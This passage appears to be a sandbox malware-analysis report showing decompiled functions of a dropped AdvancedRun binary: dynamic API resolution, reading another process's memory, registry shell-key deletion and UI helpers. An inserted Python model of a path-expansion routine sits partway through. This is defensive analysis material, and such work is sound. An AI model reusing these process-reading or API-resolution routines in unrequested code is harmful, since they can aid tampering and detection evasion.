                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                  • String ID: \systemroot
                                                                  • API String ID: 4173585201-1821301763
                                                                  • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                  • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                  • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                  • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
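Added example, not code from the binary or from NirSoft: a Python model of the path-expansion routine E0040920A decompiled above, so that its branches can be checked on constructed inputs. GetWindowsDirectoryW (subcall 00404C08) is replaced by a `windows_dir` parameter, and the helper 0040488D (wcslen, wcslen, _memicmp) is modelled as a case-insensitive search that returns the match index; both are assumptions made for the example. The point worth noting for triage: only inputs that start with `\systemroot` or a bare `\` are rewritten onto the Windows directory or its drive; a drive-qualified path passes through, and a bare file name or relative path is copied verbatim by wcscpy, so what it finally resolves to depends on whatever consumes the buffer (working directory, search path), not on this routine.

```python
"""Model of E0040920A (AdvancedRun path expansion) as decompiled in the report.
Added example; not the binary's own code. `windows_dir` stands in for
GetWindowsDirectoryW and is an assumption."""

# String literal referenced by the routine. The helper 0040488D (wcslen, wcslen,
# _memicmp) is modelled as a case-insensitive substring search returning the
# match index, or a negative value when absent (assumption).
SYSTEMROOT_PREFIX = "\\systemroot"


def find_ci(haystack: str, needle: str) -> int:
    """Case-insensitive find standing in for E0040488D (-1 when not found)."""
    return haystack.lower().find(needle.lower())


def expand_path(path: str, windows_dir: str = "C:\\Windows") -> str:
    """Return what E0040920A writes into its output buffer (__edi) for `path`."""
    # Branch 1: ':' at index 0, or one found by wcschr(path + 1, ':'), i.e. a
    # drive-qualified input such as "C:\x.exe". The decompilation shows the copy
    # starting at the ':' itself (&(_t17[0])); this model assumes the intended
    # result is the drive-qualified path unchanged.
    if path[:1] == ":" or ":" in path[1:]:
        return path

    # Branch 2: "\systemroot..." in any case -> Windows directory + remainder.
    # wcscat(dst, src + 0x16 + idx*2) skips 0x16 bytes = 11 UTF-16 units, the
    # length of the prefix.
    idx = find_ci(path, SYSTEMROOT_PREFIX)
    if idx >= 0:
        return windows_dir + path[idx + len(SYSTEMROOT_PREFIX):]

    # Branch 3: leading backslash -> memcpy(dst, windir, 4) copies two UTF-16
    # units ("C:"), the buffer is terminated, then the input is appended.
    if path[:1] == "\\":
        return windows_dir[:2] + path

    # Branch 4: anything else (bare file name, relative path) is copied verbatim
    # by wcscpy and left for the consumer to resolve.
    return path


def classify(path: str) -> str:
    """Label the branch taken; useful when triaging the command line handed to
    the dropped AdvancedRun process (process 5 in this report)."""
    if path[:1] == ":" or ":" in path[1:]:
        return "drive-qualified"
    if find_ci(path, SYSTEMROOT_PREFIX) >= 0:
        return "systemroot"
    if path[:1] == "\\":
        return "rooted-on-system-drive"
    return "relative"


if __name__ == "__main__":
    # Constructed inputs, not taken from the report.
    for p in ("\\systemroot\\system32\\cmd.exe", "\\SystemRoot\\Temp\\x.exe",
              "\\Users\\Public\\a.exe", "C:\\tools\\b.exe", "c.exe"):
        print(f"{p!r:40} -> {expand_path(p)!r:40} [{classify(p)}]")
```

Running the block prints each constructed input beside its expanded form and the branch that produced it; swap in a different `windows_dir` to see the drive and directory substitutions move with it.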

                                                                  C-Code - Quality: 48%
                                                                  			E00409C70(signed int* _a4) {
                                                                  				signed int _v8;
                                                                  				_Unknown_base(*)()* _v12;
                                                                  				char* _v16;
                                                                  				int _v18;
                                                                  				signed int _v20;
                                                                  				char _v36;
                                                                  				intOrPtr* _t21;
                                                                  				struct HINSTANCE__* _t22;
                                                                  				signed int _t23;
                                                                  				signed int _t24;
                                                                  				_Unknown_base(*)()* _t26;
                                                                  				char* _t28;
                                                                  				int _t31;
                                                                  
                                                                  				_t21 = _a4;
                                                                  				if( *_t21 == 0) {
                                                                  					_t22 = GetModuleHandleW(L"kernel32.dll");
                                                                  					_v8 = _t22;
                                                                  					_t23 = GetProcAddress(_t22, "GetProcAddress");
                                                                  					 *_a4 = _t23;
                                                                  					_t24 = _t23 ^ _v8;
                                                                  					if((_t24 & 0xfff00000) != 0) {
                                                                  						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
                                                                  						_v20 = _v20 & 0x00000000;
                                                                  						_v12 = _t26;
                                                                  						asm("stosd");
                                                                  						asm("stosw");
                                                                  						asm("movsd");
                                                                  						asm("movsd");
                                                                  						asm("movsd");
                                                                  						asm("movsw");
                                                                  						_t28 =  &_v36;
                                                                  						asm("movsb");
                                                                  						_v16 = _t28;
                                                                  						_v20 = strlen(_t28);
                                                                  						_t31 = strlen( &_v36);
                                                                  						_v18 = _t31;
                                                                  						_t24 = _v12(_v8,  &_v20, 0, _a4);
                                                                  					}
                                                                  					return _t24;
                                                                  				}
                                                                  				return _t21;
                                                                  			}

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                  • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                  • strlen.MSVCRT ref: 00409CE4
                                                                  • strlen.MSVCRT ref: 00409CF1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcstrlen
                                                                  • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                  • API String ID: 1027343248-2054640941
                                                                  • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                  • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                  • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                  • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                  Uniqueness
                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 79%
                                                                  			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
                                                                  				long _v8;
                                                                  				int _v12;
                                                                  				intOrPtr _v16;
                                                                  				int _v20;
                                                                  				int _v24;
                                                                  				char _v28;
                                                                  				void _v538;
                                                                  				char _v540;
                                                                  				int _v548;
                                                                  				char _v564;
                                                                  				char _v22292;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* _t37;
                                                                  				void* _t48;
                                                                  				void* _t56;
                                                                  				signed int _t57;
                                                                  				void* _t67;
                                                                  				long _t69;
                                                                  				void* _t70;
                                                                  				void* _t72;
                                                                  				void* _t74;
                                                                  				void* _t76;
                                                                  
                                                                  				_t67 = __edx;
                                                                  				E0040B550(0x5714, __ecx);
                                                                  				_t37 = OpenProcess(0x10, 0, _a16);
                                                                  				_t82 = _t37;
                                                                  				_a16 = _t37;
                                                                  				if(_t37 == 0) {
                                                                  					_t69 = GetLastError();
                                                                  				} else {
                                                                  					_t72 =  &_v22292;
                                                                  					E0040171F(_t72, _t82);
                                                                  					_v8 = 0;
                                                                  					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
                                                                  						_t69 = GetLastError();
                                                                  					} else {
                                                                  						_t48 = E00405642( &_v564);
                                                                  						_t74 = _v548;
                                                                  						_t70 = _t48;
                                                                  						_a12 = _t74;
                                                                  						_v540 = 0;
                                                                  						memset( &_v538, 0, 0x1fe);
                                                                  						asm("cdq");
                                                                  						_push(_t67);
                                                                  						_push(_t74);
                                                                  						_push(_t70);
                                                                  						_push(L"%d  %I64x");
                                                                  						_push(0xff);
                                                                  						_push( &_v540);
                                                                  						L0040B1EC();
                                                                  						_v548 = 0;
                                                                  						E004055D1( &_v540,  &_v564);
                                                                  						_t16 = _t70 + 0xa; // 0xa
                                                                  						_t68 = _t16;
                                                                  						_v24 = 0;
                                                                  						_v12 = 0;
                                                                  						_v20 = 0;
                                                                  						_v16 = 0x100;
                                                                  						_v28 = 0;
                                                                  						E0040559A( &_v28, _t16);
                                                                  						_t76 = _v12;
                                                                  						_t56 = 0x40c4e8;
                                                                  						if(_t76 != 0) {
                                                                  							_t56 = _t76;
                                                                  						}
                                                                  						_t26 = _t70 + 2; // 0x2
                                                                  						_t66 = _t70 + _t26;
                                                                  						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
                                                                  						_t85 = _t76;
                                                                  						if(_t76 == 0) {
                                                                  							_t76 = 0x40c4e8;
                                                                  						}
                                                                  						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
                                                                  						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
                                                                  						E004055D1(_t61,  &_v28);
                                                                  					}
                                                                  					E004055D1(CloseHandle(_a16),  &_v564);
                                                                  				}
                                                                  				return _t69;
                                                                  			}

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                  • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                  • memset.MSVCRT ref: 00401B4A
                                                                  • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                  • _snwprintf.MSVCRT ref: 00401B69
                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                    • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                  • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                  • String ID: %d %I64x
                                                                  • API String ID: 2567117392-2565891505
                                                                  • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                  • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                  • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                  • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                  Uniqueness
                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 39%
                                                                  			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
                                                                  				void* _v8;
                                                                  				void _v2054;
                                                                  				short _v2056;
                                                                  				void _v4102;
                                                                  				short _v4104;
                                                                  				signed int _t28;
                                                                  				void* _t34;
                                                                  
                                                                  				E0040B550(0x1004, __ecx);
                                                                  				_t36 = 0;
                                                                  				if(E004043F8( &_v8, 0x2001f) == 0) {
                                                                  					_v2056 = 0;
                                                                  					memset( &_v2054, 0, 0x7fe);
                                                                  					_v4104 = 0;
                                                                  					memset( &_v4102, 0, 0x7fe);
                                                                  					_t34 = __ebx + 0x20a;
                                                                  					_push(_t34);
                                                                  					_push(__ebx);
                                                                  					_push(L"%s\\shell\\%s\\command");
                                                                  					_push(0x3ff);
                                                                  					_push( &_v2056);
                                                                  					L0040B1EC();
                                                                  					_push(_t34);
                                                                  					_push(__ebx);
                                                                  					_push(L"%s\\shell\\%s");
                                                                  					_push(0x3ff);
                                                                  					_push( &_v4104);
                                                                  					L0040B1EC();
                                                                  					RegDeleteKeyW(_v8,  &_v2056);
                                                                  					_t28 = RegDeleteKeyW(_v8,  &_v4104);
                                                                  					asm("sbb esi, esi");
                                                                  					_t36 =  ~_t28 + 1;
                                                                  					RegCloseKey(_v8);
                                                                  				}
                                                                  				return _t36;
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Delete_snwprintfmemset$Close
                                                                  • String ID: %s\shell\%s$%s\shell\%s\command
                                                                  • API String ID: 1018939227-3575174989
                                                                  • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                  • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                  • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                  • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                  Uniqueness
                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 58%
                                                                  			E0040313D(void* __ecx) {
                                                                  				intOrPtr _v8;
                                                                  				char _v12;
                                                                  				struct HWND__* _t6;
                                                                  				_Unknown_base(*)()* _t11;
                                                                  				struct HWND__* _t15;
                                                                  				void* _t20;
                                                                  				struct HINSTANCE__* _t23;
                                                                  
                                                                  				_v12 = 8;
                                                                  				_v8 = 0xff;
                                                                  				_t15 = 0;
                                                                  				_t20 = 0;
                                                                  				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                  				if(_t23 == 0) {
                                                                  					L5:
                                                                  					__imp__#17();
                                                                  					_t6 = 1;
                                                                  					L6:
                                                                  					if(_t6 != 0) {
                                                                  						return 1;
                                                                  					} else {
                                                                  						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                  						return 0;
                                                                  					}
                                                                  				}
                                                                  				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                  				if(_t11 != 0) {
                                                                  					_t20 = 1;
                                                                  					_t15 =  *_t11( &_v12);
                                                                  				}
                                                                  				FreeLibrary(_t23);
                                                                  				if(_t20 == 0) {
                                                                  					goto L5;
                                                                  				} else {
                                                                  					_t6 = _t15;
                                                                  					goto L6;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                  • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                  • API String ID: 2780580303-317687271
                                                                  • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                  • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                  • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                  • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 85%
                                                                  			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                  				struct HWND__* _v8;
                                                                  				struct HWND__* _v12;
                                                                  				struct tagRECT _v28;
                                                                  				struct tagRECT _v44;
                                                                  				int _t50;
                                                                  				long _t61;
                                                                  				struct HDC__* _t63;
                                                                  				intOrPtr _t65;
                                                                  				intOrPtr _t68;
                                                                  				struct HWND__* _t71;
                                                                  				intOrPtr _t72;
                                                                  				void* _t73;
                                                                  				int _t74;
                                                                  				int _t80;
                                                                  				int _t83;
                                                                  
                                                                  				_t73 = __edx;
                                                                  				_v8 = 0;
                                                                  				_v12 = 0;
                                                                  				_t74 = GetSystemMetrics(0x11);
                                                                  				_t80 = GetSystemMetrics(0x10);
                                                                  				if(_t74 == 0 || _t80 == 0) {
                                                                  					_t63 = GetDC(0);
                                                                  					_t80 = GetDeviceCaps(_t63, 8);
                                                                  					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                  					ReleaseDC(0, _t63);
                                                                  				}
                                                                  				GetWindowRect(_a4,  &_v44);
                                                                  				if((_a8 & 0x00000004) != 0) {
                                                                  					_t71 = GetParent(_a4);
                                                                  					if(_t71 != 0) {
                                                                  						_v28.left = _v28.left & 0x00000000;
                                                                  						asm("stosd");
                                                                  						asm("stosd");
                                                                  						asm("stosd");
                                                                  						GetWindowRect(_t71,  &_v28);
                                                                  						_t61 = _v28.left;
                                                                  						_t72 = _v28.top;
                                                                  						_t80 = _v28.right - _t61 + 1;
                                                                  						_t74 = _v28.bottom - _t72 + 1;
                                                                  						_v8 = _t61;
                                                                  						_v12 = _t72;
                                                                  					}
                                                                  				}
                                                                  				_t65 = _v44.right;
                                                                  				if((_a8 & 0x00000001) == 0) {
                                                                  					asm("cdq");
                                                                  					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                  				} else {
                                                                  					_t83 = 0;
                                                                  				}
                                                                  				_t68 = _v44.bottom;
                                                                  				if((_a8 & 0x00000002) != 0) {
                                                                  					L11:
                                                                  					_t50 = 0;
                                                                  					goto L12;
                                                                  				} else {
                                                                  					asm("cdq");
                                                                  					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                  					if(_t50 >= 0) {
                                                                  						L12:
                                                                  						if(_t83 < 0) {
                                                                  							_t83 = 0;
                                                                  						}
                                                                  						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                  					}
                                                                  					goto L11;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  • GetSystemMetrics.USER32 ref: 00404DC2
                                                                  • GetSystemMetrics.USER32 ref: 00404DC8
                                                                  • GetDC.USER32(00000000), ref: 00404DD5
                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                  • ReleaseDC.USER32 ref: 00404DF4
                                                                  • GetWindowRect.USER32 ref: 00404E07
                                                                  • GetParent.USER32(?), ref: 00404E12
                                                                  • GetWindowRect.USER32 ref: 00404E2F
                                                                  • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                  • String ID:
                                                                  • API String ID: 2163313125-0
                                                                  • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                  • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                  • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                  • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 88%
                                                                  			E00406398(void* __eflags, wchar_t* _a4) {
                                                                  				void* __esi;
                                                                  				void* _t3;
                                                                  				int _t6;
                                                                  
                                                                  				_t3 = E00404AAA(_a4);
                                                                  				if(_t3 != 0) {
                                                                  					wcscpy(0x40fb90, _a4);
                                                                  					wcscpy(0x40fda0, L"general");
                                                                  					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
                                                                  					asm("sbb eax, eax");
                                                                  					 *0x40fe28 =  ~(_t6 - 1) + 1;
                                                                  					E00405F14(0x40fe30, L"charset", 0x3f);
                                                                  					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
                                                                  					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
                                                                  				}
                                                                  				return _t3;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                  • wcscpy.MSVCRT ref: 004063B2
                                                                  • wcscpy.MSVCRT ref: 004063C2
                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                    • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32(0040FDA0,?,0040C4E8,0040FE30,?,0040FB90), ref: 00405F30
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                  • API String ID: 3176057301-2039793938
                                                                  • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                  • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                  • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                  • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 16%
                                                                  			E0040ADF1(signed short* __eax, void* __ecx) {
                                                                  				void* _t2;
                                                                  				signed short* _t3;
                                                                  				void* _t7;
                                                                  				void* _t8;
                                                                  				void* _t10;
                                                                  
                                                                  				_t3 = __eax;
                                                                  				_t8 = __ecx;
                                                                  				_t7 = 8;
                                                                  				while(1) {
                                                                  					_t2 =  *_t3 & 0x0000ffff;
                                                                  					if(_t2 != 0x3c) {
                                                                  						goto L3;
                                                                  					}
                                                                  					_push(_t7);
                                                                  					_push(L"&lt;");
                                                                  					L14:
                                                                  					_t2 = memcpy(_t8, ??, ??);
                                                                  					_t10 = _t10 + 0xc;
                                                                  					_t8 = _t8 + _t7;
                                                                  					L16:
                                                                  					if( *_t3 != 0) {
                                                                  						_t3 =  &(_t3[1]);
                                                                  						continue;
                                                                  					}
                                                                  					return _t2;
                                                                  					L3:
                                                                  					if(_t2 != 0x3e) {
                                                                  						if(_t2 != 0x22) {
                                                                  							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                  								if(_t2 != 0x26) {
                                                                  									if(_t2 != 0xa) {
                                                                  										 *_t8 = _t2;
                                                                  										_t8 = _t8 + 2;
                                                                  									} else {
                                                                  										_push(_t7);
                                                                  										_push(L"<br>");
                                                                  										goto L14;
                                                                  									}
                                                                  								} else {
                                                                  									_push(0xa);
                                                                  									_push(L"&amp;");
                                                                  									goto L11;
                                                                  								}
                                                                  							} else {
                                                                  								_push(0xa);
                                                                  								_push(L"&deg;");
                                                                  								L11:
                                                                  								_t2 = memcpy(_t8, ??, ??);
                                                                  								_t10 = _t10 + 0xc;
                                                                  								_t8 = _t8 + 0xa;
                                                                  							}
                                                                  						} else {
                                                                  							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                  							_t10 = _t10 + 0xc;
                                                                  							_t8 = _t8 + 0xc;
                                                                  						}
                                                                  					} else {
                                                                  						_push(_t7);
                                                                  						_push(L"&gt;");
                                                                  						goto L14;
                                                                  					}
                                                                  					goto L16;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                  • API String ID: 3510742995-3273207271
                                                                  • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                  • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                  • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                  • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
